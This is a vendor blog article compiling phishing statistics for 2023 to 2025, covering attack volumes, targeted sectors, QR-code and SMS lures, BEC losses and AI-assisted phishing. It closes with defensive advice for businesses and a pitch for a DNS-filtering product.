99 Global Phishing Statistics & Industry Trends (2023–2026)

Phishing exploits routine business operations to steal credentials or commit payment fraud. Every day, attackers distribute 3.4 billion malicious emails. It’s a volume that represents 1.2% of all global email traffic.

Records from 2023 through late 2025 show a high and steady threat level. By late 2024, spam made up 13% of total email traffic. Nearly 20% of those messages contained phishing lures. While targets like SaaS and webmail logins remain popular, attackers increasingly use QR codes and SMS to bypass standard email security.

AI technology accelerates these risks. Large language models reduced the time needed to create a convincing campaign from 16 hours to five minutes. These tools generate messages that closely resemble standard business correspondence, making lures harder to detect.

Below, you’ll find 99 current statistics grouped by volume, growth, targets, tactics, business impact, off-inbox channels, and incident response patterns.

Key Takeaways For 2026

• Email still drives many phishing campaigns, but SMS and phone-based scams keep growing as follow-on steps.
• Credential theft stays the main objective, with the highest-value targets clustered around SaaS, webmail, and major login ecosystems.
• QR codes moved into the mainstream as a link-delivery method, often tucked into attachments and “business-looking” files.
• BEC and payment diversion remain high-impact outcomes, even when the initial message looks ordinary.
• Teams that make reporting simple and contain fast limit damage more than teams that rely on inbox filtering alone.

Phishing Volume and Reporting: A High Baseline With Sharp Swings

2023 set a brutal pace, then 2024 and 2025 kept quarterly totals near the same range, with jumps that look like campaign cycles, platform shifts, and new delivery methods, not a steady climb. Security researchers detected over 80,000 new phishing websites in a single year, marking a 22% increase in host infrastructure. APWG’s quarterly reporting shows the floor stays high even when one quarter dips. For example: 

• APWG logged 877,536 phishing attacks in Q2 2024.
• APWG logged 932,923 phishing attacks in Q3 2024.

Quarterly Totals Still Sit Near a Million

• APWG recorded 1,077,501 phishing attacks in Q4 2023.
• In Q4 2024, APWG recorded 989,123 attacks, continuing the late-year rise that followed a softer first half. Q4 2024 recorded 345,881 attacks in October, 313,288 in November, and 329,954 in December.
• In 2025, APWG logged 1,003,924 attacks in Q1, then 1,130,393 in Q2, then 892,494 in Q3. That Q3 dip still lands near nine hundred thousand attacks for a single quarter.

Reporting Data Keeps Pointing to the Same Core Problem

Data puts phishing and spoofing at or near the top by count. For example, in the FBI’s 2024 IC3 report, phishing and spoofing appear as the top complaint category, with 193,407 complaints listed for 2024.

What this Means for Businesses

Plan for “always on” volume. If you treat phishing as an occasional spike, you’ll tune your controls for the wrong world. You have to build for steady pressure, then add burst capacity for campaign surges: fast takedown paths, quick user reporting, and blocking at layers that do not depend on email gateways alone.

Phishing Year-Over-Year Growth Rates

Phishing volumes haven’t settled back down since 2023. APWG tracked 1,077,501 phishing attacks in Q4 2023, then 989,123 in Q4 2024. That’s not a straight line up, it’s a high plateau. During the first five weeks of 2025, phishing incidents in the US increased by 149% compared to the same period in 2024.

In 2025, APWG recorded a noticeable swing: 1,003,924 attacks in Q1 2025, 1,130,393 in Q2 2025, then 892,494 in Q3 2025. The point isn’t “Q3 dropped, we’re fine.” The point is that quarterly totals can move fast and still stay historically high. This financial pressure is growing; the average cost of a phishing-related data breach has climbed to $4.88 million.

Impact On Businesses

Victim reporting gives a different angle on the same story. The FBI’s IC3 logged 859,532 complaints in 2024, with reported losses of $16.6 billion across categories. Phishing and spoofing sat at the top by complaint count. The total annual cost of cybercrime is projected to hit $10.5 trillion by the end of 2025.

Two business-facing buckets inside IC3 stay stubbornly expensive:

• Business Email Compromise (BEC): 21,442 complaints and $2.77 billion in reported losses during 2024.
• Phishing/smishing/vishing/pharming: 193,407 complaints in 2024.

Small firms are not exempt from this trend; 35% of micro-businesses reported experiencing phishing in the past year. Furthermore, it takes an average of 254 days to identify and contain a breach that starts with a phish, and breaches identified after the 200-day mark cost an average of $1.2 million more than those caught earlier.

Where Phishers Aim: SaaS Logins, Social Accounts, And Payment Flows

Targeting keeps drifting toward identity choke points. In practice, that means software-as-a-service (SaaS) and webmail sign-ins, social platforms, and payment brands. Attackers go where one set of credentials unlocks many downstream systems. Within web application attacks, 80% of incidents involve compromised or misused credentials.

Sector Targeting Shows Identity First

In APWG’s Q3 2025 report, the most-targeted sector was SaaS and webmail at 21.2% of attacks, followed by social media at 14.6%. Financial institutions came next at 13.2%, with e-commerce and retail close behind at 13.1%, then payment at 12.4%.

Other sectors are seeing sharp rises in interest from attackers:

• Financial services and insurance firms now face 27.7% of all phishing attacks globally.
• In the EU, public administration leads as the most targeted sector at 38%.
• Managed Service Providers (MSPs) have seen 52% of attacks on their firms begin with a phish.
• Engineering roles now account for 64% of hiring-related phishing attempts.

Brand Impersonation Keeps Tilting Toward Big Tech

Check Point Research’s brand phishing reporting shows sustained focus on major tech brands. In Q4 2025, Microsoft appeared in 22% of brand phishing attempts, with other large consumer and platform brands close behind in the top list. Globally, Microsoft remains the most impersonated brand, appearing in 51.7% of all phishing scams.

APWG’s Q3 2025 report also notes brand churn inside common themes, with Walmart listed as the most impersonated brand in that quarter, replacing DHL. While tech stays top of the list, brands like Telegram, Amazon, and Netflix have recently entered the top five impersonated entities. 

What this Means for Businesses

Your riskiest brand phish might not target your brand at all. It might target Microsoft 365, Google Workspace, payroll portals, shipping notices, or a payment processor your team uses. The solution here is to treat identity as infrastructure. Push toward phishing-resistant sign-in where you can, tighten session controls, and block known bad destinations at the DNS layer so a click in chat or a QR scan does not become a login event.

Email Threat Mechanics: Links, Attachments, And Better Disguises

Attackers did not stop using links. But they did get smarter about where links live and how scanners see them. There is a rising trend in the use of empty HTML tags that appear blank to scanners but remain clickable for users. Additionally, attacks exploiting "part-misplaced" MIME boundaries allow malicious payloads to bypass security engines.

Links Still Drive Most User Actions

In many phishing chains, the key moment stays the same: Someone gets redirected to a convincing sign-in page, then hands over credentials. Attackers keep refining page look, domain tricks, and multi-step flows that mirror real login experiences. Roughly 80% of phishing websites now use HTTPS to create a false sense of security for the victim. 

Check Point’s Q4 2025 examples highlight lookalike domains and polished flows that blend in with normal browsing. Attackers are registering these lookalike domains in bursts, often using them for only a few hours to stay ahead of blocklists.

QR Codes in Attachments Became a Reliable Bypass

APWG’s Q3 2025 report includes data from Mimecast on malicious QR codes found in email attachments. Mimecast detected 716,306 unique malicious QR codes in Q3 2025, up 13% from Q2 2025. Over the 12 months from Q2 2024 through Q3 2025, Mimecast detected more than 3 million unique malicious QR codes.

Links hidden inside PDF or HTML attachments have also risen 8% year-over-year, showing a move away from malicious files toward "structural deception" that tricks a user into a legitimate-looking workflow.

That pattern explains why “no URL in the email body” does not mean “no phishing risk.” The destination still exists. The user just reaches it through a camera scan instead of a click.

What this Means for Businesses

If your controls stop at the inbox, QR phishing and chat-delivered links will keep slipping past. Add scanning and blocking that covers destinations, not only messages. DNS-layer filtering helps here: the user’s device still has to resolve the domain after a click or scan.

Smishing, Vishing, and Off-Inbox Fraud: Growth Outside Email

Email keeps its role, yet attackers moved more effort into channels where users feel less suspicious and where corporate tooling has thinner coverage. Roughly 70% of all mobile-based phishing attacks now occur through SMS (smishing), and vishing incidents surged 442% in the latter half of 2024.

SMS Fraud Rose Again in 2025

In Q3 2025, APWG reported that SMS-based fraud increased by nearly 35% across the quarter. The use of deepfake voice clones for executive impersonation saw a 15% increase last year, and research shows that 77% of AI voice clone scam victims lost money during the engagement.

Phone And “Call This Number” Scams Keep Showing Up In Reporting. APWG’s Q4 2023 communications highlighted phone-based cybercrime surges as part of the phishing ecosystem.

A common pattern looks simple: an email or text instructs the victim to call a number, then a fake support workflow takes over. Attackers are increasingly using "hybrid" social engineering, where an email is followed by a text and then a phone call to build legitimacy.

What this Means for Businesses

Treat phones and messaging apps as first-class phishing channels. Write process rules that fit those tools: no password resets or payment changes via SMS, no vendor bank detail changes via chat, no helpdesk resets without a second check. Then back that policy with technical blocks at the destination layer.

Business Email Compromise and Payment Fraud: Fewer Clicks, Bigger Stakes

More phishing campaigns now aim at money movement, not malware delivery. However, phishing is still the primary delivery method for 54% of ransomware infections. Attackers want invoice payments, payroll changes, gift card purchases, and wire transfers.

BEC Losses Stay Huge

The FBI’s 2024 IC3 report lists BEC as a major loss driver, with $2.77 billion in losses reported for 2024. High-value "whaling" attacks targeting executives cost businesses an average of $47 million per incident. Additionally, APWG’s Q3 2025 report states that total wire-transfer BEC attacks increased by 57% compared to Q2 2025, with an average requested amount of $48,115 in Q3 2025.

The financial impact varies by company size:

• The average self-reported cost of a cyber incident for a small business has reached $56,600.
• For large enterprises, the average cost per incident has spiked by 219%, reaching over $200,000 in direct losses.
• The average downtime following a successful phishing-led attack is now 24 days.

What this Means for Businesses

Build payment friction on purpose. Use call-back verification on known numbers, add approval steps for vendor changes, and require out-of-band confirmation for bank detail updates. Do not rely on “we’ll spot the weird email.” BEC emails often look clean.

AI-Assisted Phishing and Click Economics: Higher Conversion, Not Just Higher Volume

Here, the story shifted from “attackers write better emails” to “attackers tune messages like conversion funnels.” There has been a 1,265% surge in phishing attacks linked specifically to the rise of generative AI tools.

Click-Through Rates Can Jump when Messages Look Real

In Microsoft’s 2025 Digital Defense Report, Microsoft reports much higher click-through rates for AI-generated phishing compared to human-generated phishing in its testing, citing 54% versus 12%. AI-generated phishing emails achieve a staggering 78% open rate. This is due to the lack of the usual telltale spelling and grammar mistakes, and over 82% of current phishing emails use some form of AI-generated content.

The efficiency gains for attackers are significant:

• Attackers can now save up to 95% on campaign costs by using LLMs for reconnaissance.
• More than 90% of "polymorphic" attacks now leverage AI.
• Deepfake fraud incidents have seen a 2,137% increase since 2022.

Social Engineering Tactics Keep Evolving Around Human Action

Mimecast’s 2025 Threat Intelligence reporting states that phishing accounted for 77% of attacks, up from 60% in 2024, and it highlights a 500% surge in “ClickFix” attacks, where a user gets tricked into running a command or workflow that hands control to the attacker.

What this Means for Businesses

Training still matters, yet training alone won’t keep up with higher-converting lures. Pair training with tighter identity controls and better containment. Focus on reducing the blast radius: short session lifetimes, stronger multi-factor authentication (MFA) choices, device checks, and destination blocking.

What Incident Responders Report: Phishing Still Opens Doors

A lot of teams hoped that better email security and MFA would push phishing down the list of initial access methods. Incident response summaries keep showing phishing and social engineering near the front of the chain. Business Email Compromise now accounts for 27% of all incident response engagements.

Phishing Shows up as an Initial Access Path

In Cisco Talos Incident Response reporting for Q4 2025, Talos notes an increase in phishing as an initial access vector, rising from 23% in the prior quarter to 32%. Despite technical controls, 88% of all data breaches are still attributed to human error, and failure to use MFA on privileged accounts is still responsible for 17% of cloud-based breaches.

Training and Automation Impact

Response times and training remain the best defenses:

• Organizations with active security behavior programs can reduce the number of phishing incidents by 86%.
• Employees who receive regular training report phishing attempts 4x more often.
• The use of security AI and automation for response has been shown to cut the average cost of a breach by $1.9 million.

What this Means for Businesses

Assume one phish will land each quarter, then plan what happens next. Tighten logging, make reporting easy, and build a fast containment playbook that starts with account lock, token revocation, mailbox rules review, and destination blocking.

Regional and Sector Notes: A View from North America

North America’s phishing story shifted toward mobile-first starts and identity-led outcomes. More scams now begin on a phone screen, then pull the victim into a web flow that looks like a normal login, delivery update, toll notice, or account warning. That shift matters for businesses since it moves risk outside the corporate inbox and into personal devices, shared SMS threads, and quick taps made between meetings.

Text-First Scams Became a Major On-Ramp

FTC data shows how much money moved through scams that start with a text message. In 2024, consumers reported $470 million in losses to text message scams, and the FTC noted that figure is five times higher than in 2020, even though the number of reports declined. Translation: fewer reports can still hide bigger losses when scammers improve conversion and payout per victim.

Mobile Phishing Kept Climbing

On the enterprise side, mobile channels keep gaining share. Zimperium’s 2025 mobile threat reporting says vishing rose 28% and smishing rose 22% in its measured period. 

Breach Patterns Still Reward Credential Theft

Verizon’s 2025 DBIR frames what happens after a successful lure. Within Basic Web Application Attacks, Verizon reports about 88% of breaches in that pattern involved stolen credentials. That’s a useful North America-relevant lens since so many phishing campaigns aim at cloud logins first, then reuse those credentials across email, SaaS, and admin portals.

Smishing Runs on Industrial-Scale Infrastructure

Some of the newest North America-facing signal sits in how fast scam infrastructure can appear. In a November 2025 lawsuit described by Reuters, Google alleged a text phishing scheme that created nearly 200,000 fraudulent websites in 20 days, impersonating brands like Google, USPS, and E-ZPass. Even if you treat that as one operation, it shows the scale at which text-driven phishing can spin up new domains and landing pages.

What this Means for Businesses

North America’s current pattern pushes you to cover three gaps that older “email-only” programs leave behind:

• Cover mobile starts. Write a simple rule that your team can follow on phones: no logins, password resets, or payment changes from links in texts.
• Treat credentials like cash. Prioritize phishing-resistant sign-in for high-risk roles and lock down OAuth app consent, since attackers often aim for access that survives password changes.
• Block destinations, not just messages. Texts, QR scans, and chat links still have to resolve a domain. If you block known bad and lookalike domains at the DNS layer, you can stop many chains after the tap and before the login page loads.

Where Control D Fits in a Phishing Defense Stack

DNS filtering won’t fix every phishing problem. It won’t rewrite a bad payment process, rotate passwords, or stop a user from pasting commands into a terminal. But it absolutely can stop a lot of “click to credential theft” and “click to malware” journeys by blocking the DNS lookup that happens right before a browser loads the phishing page.

Control D’s positioning here is simple:

• Block known phishing domains and lookalike infrastructure at the DNS layer (before the page loads).
• Use category-based web filtering to reduce exposure to high-risk destinations when the business context doesn’t justify access.
• For edge cases where blocklists lag, Control D’s experimental AI Malware Filter classifies suspicious domains without waiting for a blocklist entry (treat it as one more signal, not magic).

One practical mindset helps: treat phishing as “untrusted destination risk,” then combine DNS controls, email security, MFA, and finance-grade approvals so one miss doesn’t become a payout.

Practical Next Steps for Businesses

The most reliable improvements now come from reducing the number of places a phish can succeed, then blocking the destinations that power credential theft and payment fraud. Email security still matters. It just cannot be your only line.

Start with Identity Hardening that Fits Real Work

Move high-risk roles to phishing-resistant MFA where possible, lock down admin accounts, and reduce standing privileges. Treat SaaS logins as production systems, not “just accounts.”

Add Destination Blocking Outside the Inbox

A user can meet a phish through chat, a shared doc, a QR code, or a sponsored ad. DNS-layer filtering helps block access to known malicious domains across those paths, including on roaming devices. That matters when the lure arrives outside email, or when the email contains a QR code instead of a URL.

Make Payment and Vendor Changes Slow on Purpose

Use two-person approval for wire changes, verify bank detail updates using known contact info, and set rules that block “new payee” payments until someone confirms. Most teams lose money during routine workflows, not dramatic hacks.

Tighten Your Response Loop

Make reporting easy and respond fast. Untrained employees have only a 13% reporting rate, which grows to 71% after 24 months of consistent training.

That’s a Wrap

Phishing keeps working since it matches how teams actually operate: logins, invoices, quick approvals, and messages that feel routine. The data from 2023 through late 2025 shows steady volume, more off-inbox delivery, and heavier focus on SaaS and webmail credentials. 

For businesses, the best gains come from tightening identity controls, adding friction to payment changes, and blocking risky destinations outside email so a tap or scan does not turn into a sign-in event.